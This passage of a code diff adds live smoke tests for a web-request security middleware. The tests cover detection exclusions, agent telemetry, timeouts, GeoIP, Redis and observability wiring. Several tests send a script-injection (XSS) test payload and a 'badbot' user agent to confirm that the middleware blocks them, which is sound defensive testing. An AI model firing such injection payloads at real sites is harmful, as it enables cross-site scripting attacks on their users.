+        f"a clean request to a suspicious_detection route was blocked: "
+        f"{clean.status_code}"
+    )
+
+    attack = ctx.client.get("/advanced/suspicious-patterns", params={"query": _XSS})
+    assert attack.status_code == 400, (
+        f"suspicious_detection did not flag an attack payload: {attack.status_code}"
+    )

--- a/tests/live_smoke/scenarios/dynamic_rules_agent.py
+++ b/tests/live_smoke/scenarios/dynamic_rules_agent.py
@@ -1,0 +1,82 @@
+import json
+from typing import Any
+
+from tests.live_smoke.driver import ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+DYNAMIC_RULES_CACHE_PATH = "/tmp/guard-last-known-rules.json"
+REDIS_KEY = "smoke:dynamic_rules:last_known"
+
+CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": "smoke-agent-key",
+    "agent_endpoint": "http://agent-stub:8090",
+    "agent_sensitive_headers": ["x-agent-secret"],
+    "agent_flush_interval": 2,
+    "enable_dynamic_rules": True,
+    "dynamic_rules_cache_path": DYNAMIC_RULES_CACHE_PATH,
+    "excluded_detection_headers": ["x-real-ip", "x-forwarded-for"],
+}
+
+
+@scenario(
+    covers={
+        "enable_dynamic_rules",
+        "dynamic_rules_cache_path",
+        "enable_agent",
+        "agent_api_key",
+        "agent_endpoint",
+        "agent_sensitive_headers",
+        "agent_flush_interval",
+    },
+    config=CONFIG,
+)
+def dynamic_rules_and_agent_wiring(ctx: ScenarioContext) -> None:
+    ctx.agent.post("/_debug/reset")
+    mark = ctx.stack.logs.mark()
+
+    stored = wait_until(lambda: ctx.redis.get(REDIS_KEY), timeout=20.0)
+    assert stored, "no last-known dynamic rules snapshot was written to Redis"
+    assert '"rule_id":"smoke-rule"' in stored.replace(" ", "")
+    assert '"auto_ban_threshold":9' in stored.replace(" ", "")
+
+    cache_content = wait_until(lambda: _read_cache_or_none(ctx), timeout=20.0)
+    assert cache_content, "dynamic_rules_cache_path snapshot file was never written"
+    assert '"rule_id":"smoke-rule"' in cache_content.replace(" ", "")
+
+    error_lines = ctx.stack.logs.lines_since(mark, kind="Failed to")
+    assert not error_lines, f"unexpected 'Failed to' error lines: {error_lines}"
+
+    ctx.client.get(
+        "/basic/ip",
+        params={"q": "hello"},
+        headers={
+            "User-Agent": "badbot",
+            "X-Agent-Secret": "LS-AGENT-SECRET-VALUE",
+        },
+    )
+
+    state = wait_until(lambda: _debug_state_with_telemetry(ctx), timeout=25.0)
+    assert state is not None, "agent stub recorded no events/status within 25s"
+    dump = json.dumps(state)
+    assert "LS-AGENT-SECRET-VALUE" not in dump, (
+        "a header named in agent_sensitive_headers leaked into telemetry sent to "
+        f"the agent: {dump}"
+    )
+
+
+def _read_cache_or_none(ctx: ScenarioContext) -> str | None:
+    try:
+        return ctx.stack.container_file(DYNAMIC_RULES_CACHE_PATH)
+    except FileNotFoundError:
+        return None
+
+
+def _debug_state_with_telemetry(ctx: ScenarioContext) -> dict[str, Any] | None:
+    response = ctx.agent.get("/_debug/state")
+    if response.status_code != 200:
+        return None
+    data: dict[str, Any] = response.json()
+    if not (data["events"] or data["status"]):
+        return None
+    return data

--- a/tests/live_smoke/scenarios/excluded_headers.py
+++ b/tests/live_smoke/scenarios/excluded_headers.py
@@ -1,0 +1,26 @@
+from tests.live_smoke.driver import ScenarioContext
+from tests.live_smoke.registry import scenario
+
+CONFIG = {"excluded_detection_headers": ["x-real-ip", "x-forwarded-for"]}
+
+
+@scenario(covers={"excluded_detection_headers"}, config=CONFIG)
+def excluded_detection_headers_proxy_identity(ctx: ScenarioContext) -> None:
+    client = ctx.client
+    mark = ctx.stack.logs.mark()
+
+    response = client.get("/basic/ip", params={"q": "hello"})
+
+    lines = ctx.stack.logs.lines_since(mark)
+    flagged = [
+        line for line in lines if "Suspicious pattern in header 'x-real-ip'" in line
+    ]
+
+    assert response.status_code == 200, (
+        "a plain request through nginx was blocked even though x-real-ip is in "
+        f"excluded_detection_headers; response={response.status_code} lines={lines}"
+    )
+    assert not flagged, (
+        "excluded_detection_headers did not stop the private-IP pattern from "
+        f"matching the proxy's own x-real-ip value: {flagged}"
+    )

--- a/tests/live_smoke/scenarios/framework_gaps_agent_transport.py
+++ b/tests/live_smoke/scenarios/framework_gaps_agent_transport.py
@@ -1,0 +1,230 @@
+import json
+from typing import Any
+
+from tests.live_smoke.driver import ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+AGENT_API_KEY = "smoke-agent-key"
+AGENT_ENDPOINT = "http://agent-stub:8090"
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+BADBOT_HEADERS = {"User-Agent": "badbot"}
+ON_ERROR_LOG = "/smoke/on_error.jsonl"
+
+
+def _reset_agent(ctx: ScenarioContext) -> None:
+    ctx.agent.post("/_debug/reset")
+
+
+def _set_agent_delay(ctx: ScenarioContext, seconds: float) -> None:
+    ctx.agent.post("/_debug/delay", json={"seconds": seconds})
+
+
+def _set_agent_forced_status(ctx: ScenarioContext, code: int | None) -> None:
+    ctx.agent.post("/_debug/status", json={"code": code})
+
+
+def _debug_state(ctx: ScenarioContext) -> dict[str, Any]:
+    response = ctx.agent.get("/_debug/state")
+    response.raise_for_status()
+    data: dict[str, Any] = response.json()
+    return data
+
+
+def _events_request(ctx: ScenarioContext) -> dict[str, Any] | None:
+    for request in _debug_state(ctx).get("requests", []):
+        if request.get("path") == "/api/v1/events":
+            return dict(request)
+    return None
+
+
+def _high_water_mark(ctx: ScenarioContext) -> int:
+    return int(_debug_state(ctx).get("high_water_mark", 0))
+
+
+IDENTITY_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_install_id": "smoke-install-id-0001",
+    "agent_payload_signing_secret": "smoke-signing-secret",
+    "agent_guard_version": "smoke-guard-version-9.9.9",
+    "agent_flush_interval": 2,
+    "auto_ban_threshold": 1000,
+    "rate_limit": 1000,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"agent_install_id", "agent_payload_signing_secret", "agent_guard_version"},
+    config=IDENTITY_CONFIG,
+)
+def agent_transport_identity_headers_and_envelope(ctx: ScenarioContext) -> None:
+    _reset_agent(ctx)
+
+    ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+    request = wait_until(lambda: _events_request(ctx), timeout=20.0)
+    assert request is not None, "no /api/v1/events request reached the agent stub"
+
+    headers = {name.lower(): value for name, value in request["headers"].items()}
+    assert headers.get("x-agent-install-id") == "smoke-install-id-0001", headers
+    signature = headers.get("x-payload-signature")
+    assert signature and signature.startswith("v1="), (
+        f"agent_payload_signing_secret should produce an X-Payload-Signature "
+        f"header; got {signature!r}"
+    )
+
+    envelope = request["envelope"]
+    assert envelope.get("guard_version") == "smoke-guard-version-9.9.9", envelope
+
+
+TIMEOUT_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_timeout": 1,
+    "agent_retry_attempts": 0,
+    "agent_flush_interval": 2,
+    "auto_ban_threshold": 1000,
+    "rate_limit": 1000,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+def _read_timeout_logged(ctx: ScenarioContext, mark: str) -> list[str]:
+    return [
+        line
+        for line in ctx.stack.logs.lines_since(mark)
+        if "HTTP client error for POST" in line and "ReadTimeout" in line
+    ]
+
+
+@scenario(covers={"agent_timeout"}, config=TIMEOUT_CONFIG)
+def agent_timeout_bounds_transport_requests(ctx: ScenarioContext) -> None:
+    _reset_agent(ctx)
+    _set_agent_delay(ctx, 3.0)
+    mark = ctx.stack.logs.mark()
+    try:
+        ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+        timed_out = wait_until(lambda: _read_timeout_logged(ctx, mark), timeout=15.0)
+        assert timed_out, (
+            "agent_timeout=1 with a 3s stub delay never logged a read timeout"
+        )
+    finally:
+        _set_agent_delay(ctx, 0.0)
+
+    healthy = ctx.client.get("/basic/health")
+    assert healthy.status_code == 200, (
+        "the app must stay healthy after an agent transport timeout"
+    )
+
+
+def _concurrency_config(max_concurrent_flushes: int) -> dict[str, object]:
+    return {
+        "enable_agent": True,
+        "agent_api_key": AGENT_API_KEY,
+        "agent_endpoint": AGENT_ENDPOINT,
+        "agent_buffer_size": 4,
+        "agent_high_watermark_ratio": 0.25,
+        "agent_max_concurrent_flushes": max_concurrent_flushes,
+        "agent_flush_interval": 120,
+        "auto_ban_threshold": 1000,
+        "rate_limit": 1000,
+        "excluded_detection_headers": EXCLUDED_HEADERS,
+    }
+
+
+CONCURRENCY_CONFIG = _concurrency_config(1)
+CONCURRENCY_CONFIG_WIDE = _concurrency_config(8)
+
+
+def _burst_high_water_mark(ctx: ScenarioContext) -> int:
+    _reset_agent(ctx)
+    _set_agent_delay(ctx, 2.0)
+    try:
+        for _ in range(20):
+            ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+        wait_until(lambda: _high_water_mark(ctx) >= 1, timeout=15.0)
+    finally:
+        _set_agent_delay(ctx, 0.0)
+
+    return _high_water_mark(ctx)
+
+
+@scenario(covers={"agent_max_concurrent_flushes"}, config=CONCURRENCY_CONFIG)
+def agent_max_concurrent_flushes_bounds_in_flight_sends(ctx: ScenarioContext) -> None:
+    narrow_mark = _burst_high_water_mark(ctx)
+
+    ctx.stack.restart_with(CONCURRENCY_CONFIG_WIDE, force=True)
+    wide_mark = _burst_high_water_mark(ctx)
+
+    assert narrow_mark < wide_mark, (
+        "agent_max_concurrent_flushes should bound in-flight event/metric POSTs; "
+        f"narrow (max_concurrent_flushes=1) observed high_water_mark="
+        f"{narrow_mark}, wide (max_concurrent_flushes=8) observed "
+        f"high_water_mark={wide_mark}, expected narrow < wide"
+    )
+
+
+AGENT_CONFIG_WIRING_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_max_payload_size": 4096,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"agent_max_payload_size"}, config=AGENT_CONFIG_WIRING_CONFIG)
+def agent_max_payload_size_reflected_in_effective_config(ctx: ScenarioContext) -> None:
+    response = ctx.client.get("/smoke/agent-config")
+    assert response.status_code == 200
+    data = response.json()
+    assert data.get("enabled") is True, data
+    assert data.get("max_payload_size") == 4096, data
+
+
+ON_ERROR_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_strict": False,
+    "agent_retry_attempts": 0,
+    "agent_flush_interval": 2,
+    "auto_ban_threshold": 1000,
+    "rate_limit": 1000,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+def _on_error_log_has_transport_failure(ctx: ScenarioContext) -> bool:
+    try:
+        text = ctx.stack.container_file(ON_ERROR_LOG)
+    except FileNotFoundError:
+        return False
+    return any(
+        json.loads(line).get("stage") == "transport_send"
+        for line in text.splitlines()
+        if line.strip()
+    )
+
+
+@scenario(covers={"on_error"}, config=ON_ERROR_CONFIG)
+def on_error_hook_records_transport_failure(ctx: ScenarioContext) -> None:
+    _reset_agent(ctx)
+    _set_agent_forced_status(ctx, 500)
+    try:
+        ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+        found = wait_until(
+            lambda: _on_error_log_has_transport_failure(ctx), timeout=20.0
+        )
+        assert found, "on_error hook never recorded a transport_send failure"
+    finally:
+        _set_agent_forced_status(ctx, None)
+
+    healthy = ctx.client.get("/basic/health")
+    assert healthy.status_code == 200

--- a/tests/live_smoke/scenarios/framework_gaps_decorators.py
+++ b/tests/live_smoke/scenarios/framework_gaps_decorators.py
@@ -1,0 +1,104 @@
+from tests.live_smoke.driver import ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+BASE_CONFIG = {"excluded_detection_headers": EXCLUDED_HEADERS}
+
+
+@scenario(covers={"require_authorization_header"}, config=BASE_CONFIG)
+def require_authorization_header_enforces_presence_only(ctx: ScenarioContext) -> None:
+    client = ctx.client
+
+    missing = client.get("/smoke/authz-header")
+    assert missing.status_code == 401, missing.status_code
+
+    present = client.get(
+        "/smoke/authz-header", headers={"Authorization": "Bearer anything-at-all"}
+    )
+    assert present.status_code == 200, present.status_code
+
+
+@scenario(covers={"detection_exclusion"}, config=BASE_CONFIG)
+def detection_exclusion_skips_the_named_param(ctx: ScenarioContext) -> None:
+    client = ctx.client
+    attack = "<script>alert(1)</script>"
+
+    excluded = client.get("/smoke/detection-exclusion", params={"safe_marker": attack})
+    assert excluded.status_code == 200, (
+        f"detection_exclusion(params={{'safe_marker'}}) still blocked an attack in "
+        f"the excluded param: {excluded.status_code}"
+    )
+
+    scanned = client.get(
+        "/smoke/detection-exclusion", params={"safe_marker": "hello", "q": attack}
+    )
+    assert scanned.status_code == 400, (
+        f"a non-excluded query param on the same route stopped being scanned: "
+        f"{scanned.status_code}"
+    )
+
+
+@scenario(covers={"require_auth"}, config=BASE_CONFIG)
+def require_auth_decorator_rejects_missing_bearer_token(ctx: ScenarioContext) -> None:
+    client = ctx.client
+
+    missing = client.get("/auth/bearer-auth")
+    assert missing.status_code == 401
+
+    present = client.get(
+        "/auth/bearer-auth", headers={"Authorization": "Bearer smoke-token"}
+    )
+    assert present.status_code == 200
+
+
+AGENT_EVENTS_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": "smoke-agent-key",
+    "agent_endpoint": "http://agent-stub:8090",
+    "agent_flush_interval": 2,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+_EXPECTED_EVENT_TYPES = {
+    "smoke_decorator_event",
+    "decorator_violation",
+    "access_denied",
+    "authentication_failed",
+    "rate_limited",
+}
+
+
+def _event_types_seen(ctx: ScenarioContext) -> set[str] | None:
+    response = ctx.agent.get("/_debug/state")
+    if response.status_code != 200:
+        return None
+    events = response.json().get("events", [])
+    seen = {event.get("event_type") for event in events}
+    return seen if _EXPECTED_EVENT_TYPES & seen else None
+
+
+@scenario(
+    covers={
+        "send_decorator_event",
+        "send_decorator_violation_event",
+        "send_access_denied_event",
+        "send_authentication_failed_event",
+        "send_rate_limit_event",
+        "initialize_behavior_tracking",
+    },
+    config=AGENT_EVENTS_CONFIG,
+)
+def decorator_event_helpers_reach_the_agent(ctx: ScenarioContext) -> None:
+    ctx.agent.post("/_debug/reset")
+
+    response = ctx.client.get("/smoke/decorator-events")
+    assert response.status_code == 200, response.status_code
+    assert response.json() == {"triggered": True}
+
+    seen = wait_until(lambda: _event_types_seen(ctx), timeout=20.0)
+    assert seen is not None, (
+        "none of the SecurityDecorator send_*_event helpers reached the agent stub"
+    )
+    assert _EXPECTED_EVENT_TYPES <= seen, (
+        f"expected every one of {_EXPECTED_EVENT_TYPES}, got {seen}"
+    )

--- a/tests/live_smoke/scenarios/framework_gaps_detection_limits.py
+++ b/tests/live_smoke/scenarios/framework_gaps_detection_limits.py
@@ -1,0 +1,179 @@
+import json
+import re
+
+from tests.live_smoke.driver import (
+    ScenarioContext,
+    run_in_app_container,
+    send_slow_body,
+)
+from tests.live_smoke.registry import scenario
+
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+
+COMPILER_TIMEOUT_CONFIG = {"excluded_detection_headers": EXCLUDED_HEADERS}
+
+_COMPILER_TIMEOUT_PROBE = """
+import asyncio
+import logging
+import time
+
+logging.basicConfig(level=logging.WARNING, format="%(levelname)s %(name)s %(message)s")
+
+from guard_core.handlers.suspatterns_handler import sus_patterns_handler
+
+
+class _SmokeConfig:
+    detection_compiler_timeout = 0.1
+
+
+class _SlowPattern:
+    pattern = "smoke-slow-pattern-probe"
+
+    def search(self, content, pos=0):
+        time.sleep(5)
+        return None
+
+
+sus_patterns_handler._config = _SmokeConfig()
+
+
+async def main():
+    start = time.monotonic()
+    match, timed_out = await sus_patterns_handler._check_pattern_with_timeout(
+        _SlowPattern(), "irrelevant", "203.0.113.9", start
+    )
+    elapsed = time.monotonic() - start
+    print(f"SMOKE_COMPILER_TIMEOUT_PROBE match={match} timed_out={timed_out} "
+          f"elapsed={elapsed:.3f}", flush=True)
+
+
+asyncio.run(main())
+"""
+
+
+@scenario(covers={"detection_compiler_timeout"}, config=COMPILER_TIMEOUT_CONFIG)
+def detection_compiler_timeout_cuts_off_a_slow_pattern_match(
+    ctx: ScenarioContext,
+) -> None:
+    result = run_in_app_container(_COMPILER_TIMEOUT_PROBE, timeout=20.0)
+    output = result.stdout + result.stderr
+
+    assert "SMOKE_COMPILER_TIMEOUT_PROBE" in output, (
+        f"the detection_compiler_timeout probe did not complete; output: {output!r}"
+    )
+    assert "timed_out=True" in output, (
+        "detection_compiler_timeout=0.1 did not cut off a pattern match "
+        f"whose search() call took 5s; probe output: {output!r}"
+    )
+    assert "elapsed=0.1" in output, (
+        "the match should have been cut off close to the configured 0.1s "
+        f"budget, not the full 5s search duration; probe output: {output!r}"
+    )
+    assert (
+        "Regex timeout exceeded for pattern" in output
+        or "Pattern timeout:" in output
+        or "Pattern exceeded scan time budget" in output
+    ), (
+        "detection_compiler_timeout's cutoff did not produce its documented "
+        f"warning log line; probe output: {output!r}"
+    )
+
+
+BODY_READ_TIMEOUT_CONFIG = {
+    "body_read_timeout": 0.5,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"body_read_timeout"}, config=BODY_READ_TIMEOUT_CONFIG)
+def body_read_timeout_skips_detection_on_a_stalled_body(ctx: ScenarioContext) -> None:
+    payload = b'{"note": "<script>alert(1)</script>"}'
+
+    fast_status, _headers, _body = send_slow_body(
+        "/basic/echo", {"Content-Type": "application/json"}, payload, stall_seconds=0.0
+    )
+    assert fast_status == 400, (
+        "the same body without a stall should still be blocked by detection, "
+        f"got {fast_status}"
+    )
+
+    slow_status, _headers, slow_body = send_slow_body(
+        "/basic/echo", {"Content-Type": "application/json"}, payload, stall_seconds=2.0
+    )
+    assert slow_status == 200, (
+        "body_read_timeout=0.5 with a 2s stalled body should let the request "
+        "through: guard-core's own body read gives up and treats the body as "
+        f"unavailable for detection; got {slow_status} body={slow_body!r}"
+    )
+
+
+_SYNC_CONCURRENCY_PROBE = """
+import json
+import threading
+import time
+
+from guard_core.sync._utils.body_reader import _safe_read
+
+start = time.monotonic()
+events = []
+lock = threading.Lock()
+
+
+def make_reader(tag):
+    def reader():
+        with lock:
+            events.append((tag, "start", time.monotonic() - start))
+        time.sleep(1.0)
+        with lock:
+            events.append((tag, "end", time.monotonic() - start))
+        return b"x"
+
+    return reader
+
+
+def call(tag):
+    _safe_read(make_reader(tag), timeout=10.0, max_concurrent=1)
+
+
+t1 = threading.Thread(target=call, args=("A",))
+t2 = threading.Thread(target=call, args=("B",))
+t1.start()
+time.sleep(0.2)
+t2.start()
+t1.join()
+t2.join()
+
+print("SMOKE_SYNC_PROBE " + json.dumps(events))
+"""
+
+_SYNC_PROBE_MARKER = re.compile(r"SMOKE_SYNC_PROBE (\[.*\])")
+
+
+def _sync_concurrency_probe_events() -> list[tuple[str, str, float]] | None:
+    result = run_in_app_container(_SYNC_CONCURRENCY_PROBE, timeout=20.0)
+    match = _SYNC_PROBE_MARKER.search(result.stdout + result.stderr)
+    if not match:
+        return None
+    events: list[tuple[str, str, float]] = json.loads(match.group(1))
+    return events
+
+
+@scenario(
+    covers={"sync_body_read_max_concurrent"},
+    config={"excluded_detection_headers": EXCLUDED_HEADERS},
+)
+def sync_body_read_max_concurrent_serializes_reads(ctx: ScenarioContext) -> None:
+    events = _sync_concurrency_probe_events()
+    assert events is not None, (
+        "the sync_body_read_max_concurrent probe produced no parsable output"
+    )
+
+    by_tag = {(tag, kind): timestamp for tag, kind, timestamp in events}
+    assert {"A", "B"} <= {tag for tag, _kind, _timestamp in events}, events
+
+    a_end = by_tag[("A", "end")]
+    b_start = by_tag[("B", "start")]
+    assert b_start >= a_end - 0.2, (
+        f"max_concurrent=1 should serialize the two reads; B started at "
+        f"{b_start:.2f}s, before A finished at {a_end:.2f}s: {events}"
+    )

--- a/tests/live_smoke/scenarios/framework_gaps_infra.py
+++ b/tests/live_smoke/scenarios/framework_gaps_infra.py
@@ -1,0 +1,129 @@
+import os
+
+from tests.live_smoke.driver import (
+    STACK_DIR,
+    ScenarioContext,
+    make_redis_client,
+    run_in_app_container,
+    wait_until,
+)
+from tests.live_smoke.registry import scenario
+from tests.live_smoke.scenarios.access_control import _build_mmdb
+
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+CLIENT_IP = "192.168.50.50"
+
+_GEO_HANDLER_HOST_PATH = STACK_DIR / "scenario_data" / "geo_smoke_handler.mmdb"
+GEO_HANDLER_CONTAINER_PATH = "/smoke/geo_smoke_handler.mmdb"
+
+if os.environ.get("LIVE_SMOKE") == "1":
+    _GEO_HANDLER_HOST_PATH.parent.mkdir(parents=True, exist_ok=True)
+    _GEO_HANDLER_HOST_PATH.write_bytes(_build_mmdb({CLIENT_IP: "US"}))
+
+
+REDIS_URL_CONFIG = {
+    "redis_url": "redis://redis:6379/1",
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"redis_url"}, config=REDIS_URL_CONFIG)
+def redis_url_targets_the_configured_database(ctx: ScenarioContext) -> None:
+    db1 = make_redis_client(db=1)
+    try:
+        db1.flushdb()
+        ctx.redis.flushdb()
+
+        ctx.client.get("/basic/ip", params={"q": "hello"})
+
+        keys_db1 = wait_until(lambda: db1.keys("smoke:*") or None, timeout=10.0)
+        assert keys_db1, "redis_url=redis://redis:6379/1 wrote no keys into db 1"
+
+        keys_db0 = ctx.redis.keys("smoke:*")
+        assert not keys_db0, (
+            "this scenario's own traffic should not have written to db 0 once "
+            f"redis_url points at db 1, found {keys_db0}"
+        )
+    finally:
+        db1.flushdb()
+        db1.close()
+
+
+GEO_HANDLER_CONFIG = {
+    "blocked_countries": ["ZZ"],
+    "smoke_geoip_db": GEO_HANDLER_CONTAINER_PATH,
+    "geo_ip_db_max_age": 3600,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"geo_ip_handler"}, config=GEO_HANDLER_CONFIG)
+def geo_ip_handler_resolves_country_from_the_explicit_handler(
+    ctx: ScenarioContext,
+) -> None:
+    response = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert response.status_code == 200, (
+        "an explicit geo_ip_handler built from smoke_geoip_db should resolve the "
+        f"client's country and let it through blocked_countries=['ZZ']: "
+        f"{response.status_code}"
+    )
+
+
+_GEO_MAX_AGE_PROBE = """
+import asyncio
+import logging
+import os
+import time
+from pathlib import Path
+
+logging.basicConfig(level=logging.INFO, format="%(levelname)s %(name)s %(message)s")
+
+from guard_core.handlers.ipinfo_handler import IPInfoManager
+
+db_path = Path("/tmp/smoke_geo_max_age_probe.mmdb")
+db_path.write_bytes(Path({fixture!r}).read_bytes())
+stale = time.time() - 100000
+os.utime(db_path, (stale, stale))
+
+handler = IPInfoManager(token="smoke-max-age-token", db_path=db_path, max_age=1)
+asyncio.run(handler.initialize())
+print("SMOKE_PROBE_DONE", handler.reader is not None)
+"""
+
+
+def _geo_max_age_probe_output(timeout: float = 25.0) -> str:
+    result = run_in_app_container(
+        _GEO_MAX_AGE_PROBE.format(fixture=GEO_HANDLER_CONTAINER_PATH), timeout=timeout
+    )
+    return result.stdout + result.stderr
+
+
+@scenario(covers={"geo_ip_db_max_age"}, config=GEO_HANDLER_CONFIG)
+def geo_ip_db_max_age_triggers_a_refresh_attempt_when_stale(
+    ctx: ScenarioContext,
+) -> None:
+    output = _geo_max_age_probe_output()
+    assert "SMOKE_PROBE_DONE" in output, (
+        "geo_ip_db_max_age probe did not complete inside its bounded exec "
+        f"window; output: {output!r}"
+    )
+    assert "IPInfo database download failed, keeping existing reader" in output, (
+        "geo_ip_db_max_age=1 with a stale mtime should make IPInfoManager."
+        f"initialize() attempt (and log the failure of) a fresh download; "
+        f"probe output: {output!r}"
+    )
+
+
+ENFORCE_HTTPS_CONFIG = {
+    "enforce_https": True,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"enforce_https"}, config=ENFORCE_HTTPS_CONFIG)
+def enforce_https_field_redirects_plain_http_requests(ctx: ScenarioContext) -> None:
+    response = ctx.client.get("/basic/health")
+    assert response.status_code == 301, (
+        f"enforce_https=True should redirect a plain HTTP request: "
+        f"{response.status_code}"
+    )

--- a/tests/live_smoke/scenarios/framework_gaps_observability.py
+++ b/tests/live_smoke/scenarios/framework_gaps_observability.py
@@ -1,0 +1,88 @@
+import base64
+
+from tests.live_smoke.driver import ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+BADBOT_HEADERS = {"User-Agent": "badbot"}
+
+OTEL_SERVICE_NAME = "smoke-otel-service-gap"
+OTEL_CONFIG = {
+    "enable_otel": True,
+    "otel_service_name": OTEL_SERVICE_NAME,
+    "otel_exporter_endpoint": "http://otlp-stub:4318",
+    "otel_resource_attributes": {"deployment.environment": "smoke-otel-env"},
+    "auto_ban_threshold": 1000,
+    "rate_limit": 1000,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+def _otlp_trace_bodies(ctx: ScenarioContext) -> list[bytes]:
+    response = ctx.otlp.get("/_debug/state")
+    response.raise_for_status()
+    return [
+        base64.b64decode(request["body_base64"])
+        for request in response.json().get("requests", [])
+        if request.get("path") == "/v1/traces"
+    ]
+
+
+def _otel_traces_seen(ctx: ScenarioContext) -> list[bytes] | None:
+    bodies = [
+        body for body in _otlp_trace_bodies(ctx) if OTEL_SERVICE_NAME.encode() in body
+    ]
+    return bodies or None
+
+
+@scenario(
+    covers={"otel_service_name", "otel_exporter_endpoint", "otel_resource_attributes"},
+    config=OTEL_CONFIG,
+)
+def otel_exports_service_name_and_resource_attributes(ctx: ScenarioContext) -> None:
+    ctx.otlp.post("/_debug/reset")
+
+    ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+    bodies = wait_until(lambda: _otel_traces_seen(ctx), timeout=30.0)
+    assert bodies, (
+        "no OTLP traces POST carrying otel_service_name reached otlp-stub; "
+        "otel_exporter_endpoint is not wiring real telemetry"
+    )
+    assert any(b"smoke-otel-env" in body for body in bodies), (
+        "otel_resource_attributes['deployment.environment'] never appeared in the "
+        "exported OTLP traces payload"
+    )
+
+
+LOGFIRE_SERVICE_NAME = "smoke-logfire-service-gap"
+LOGFIRE_CONFIG = {
+    "enable_logfire": True,
+    "logfire_service_name": LOGFIRE_SERVICE_NAME,
+    "auto_ban_threshold": 1000,
+    "rate_limit": 1000,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+def _logfire_request_seen(ctx: ScenarioContext) -> bool:
+    response = ctx.otlp.get("/_debug/state")
+    response.raise_for_status()
+    for request in response.json().get("requests", []):
+        headers = {name.lower(): value for name, value in request["headers"].items()}
+        if headers.get("user-agent", "").startswith("logfire/"):
+            return True
+    return False
+
+
+@scenario(covers={"logfire_service_name"}, config=LOGFIRE_CONFIG)
+def logfire_delivers_spans_to_its_configured_base_url(ctx: ScenarioContext) -> None:
+    ctx.otlp.post("/_debug/reset")
+
+    ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+    seen = wait_until(lambda: _logfire_request_seen(ctx), timeout=30.0)
+    assert seen, (
+        "no logfire-originated request (User-Agent: logfire/...) reached the "
+        "OTLP stub; LOGFIRE_BASE_URL/logfire_service_name wiring is not working"
+    )

--- a/tests/live_smoke/scenarios/framework_gaps_websocket.py
+++ b/tests/live_smoke/scenarios/framework_gaps_websocket.py
@@ -1,0 +1,126 @@
+import base64
+import os
+import socket
+import struct
+from urllib.parse import quote
+
+from tests.live_smoke.driver import NGINX_PORT, ScenarioContext
+from tests.live_smoke.registry import scenario
+
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+CLIENT_IP = "192.168.50.50"
+_XSS_QUERY = quote("<script>alert(1)</script>")
+_BASE_CONFIG = {"excluded_detection_headers": EXCLUDED_HEADERS}
+
+
+def _parse_status_line(head: bytes) -> tuple[int, dict[str, str]]:
+    lines = head.split(b"\r\n")
+    status_line = lines[0].decode("latin-1") if lines else ""
+    parts = status_line.split(" ", 2)
+    status_code = int(parts[1]) if len(parts) >= 2 and parts[1].isdigit() else 0
+    headers: dict[str, str] = {}
+    for line in lines[1:]:
+        name, sep, value = line.decode("latin-1").partition(":")
+        if sep:
+            headers[name.strip().lower()] = value.strip()
+    return status_code, headers
+
+
+def _open_handshake(
+    path: str, timeout: float = 10.0
+) -> tuple[int, dict[str, str], socket.socket | None]:
+    key = base64.b64encode(os.urandom(16)).decode("ascii")
+    request_headers = {
+        "Host": "localhost",
+        "Upgrade": "websocket",
+        "Connection": "Upgrade",
+        "Sec-WebSocket-Key": key,
+        "Sec-WebSocket-Version": "13",
+    }
+    header_lines = "\r\n".join(
+        f"{name}: {value}" for name, value in request_headers.items()
+    )
+    request = f"GET {path} HTTP/1.1\r\n{header_lines}\r\n\r\n"
+
+    sock = socket.create_connection(("localhost", NGINX_PORT), timeout=timeout)
+    sock.settimeout(timeout)
+    sock.sendall(request.encode("latin-1"))
+
+    raw = b""
+    while b"\r\n\r\n" not in raw:
+        chunk = sock.recv(65536)
+        if not chunk:
+            break
+        raw += chunk
+    head, _, _ = raw.partition(b"\r\n\r\n")
+    status_code, headers = _parse_status_line(head)
+
+    if status_code != 101:
+        sock.close()
+        return status_code, headers, None
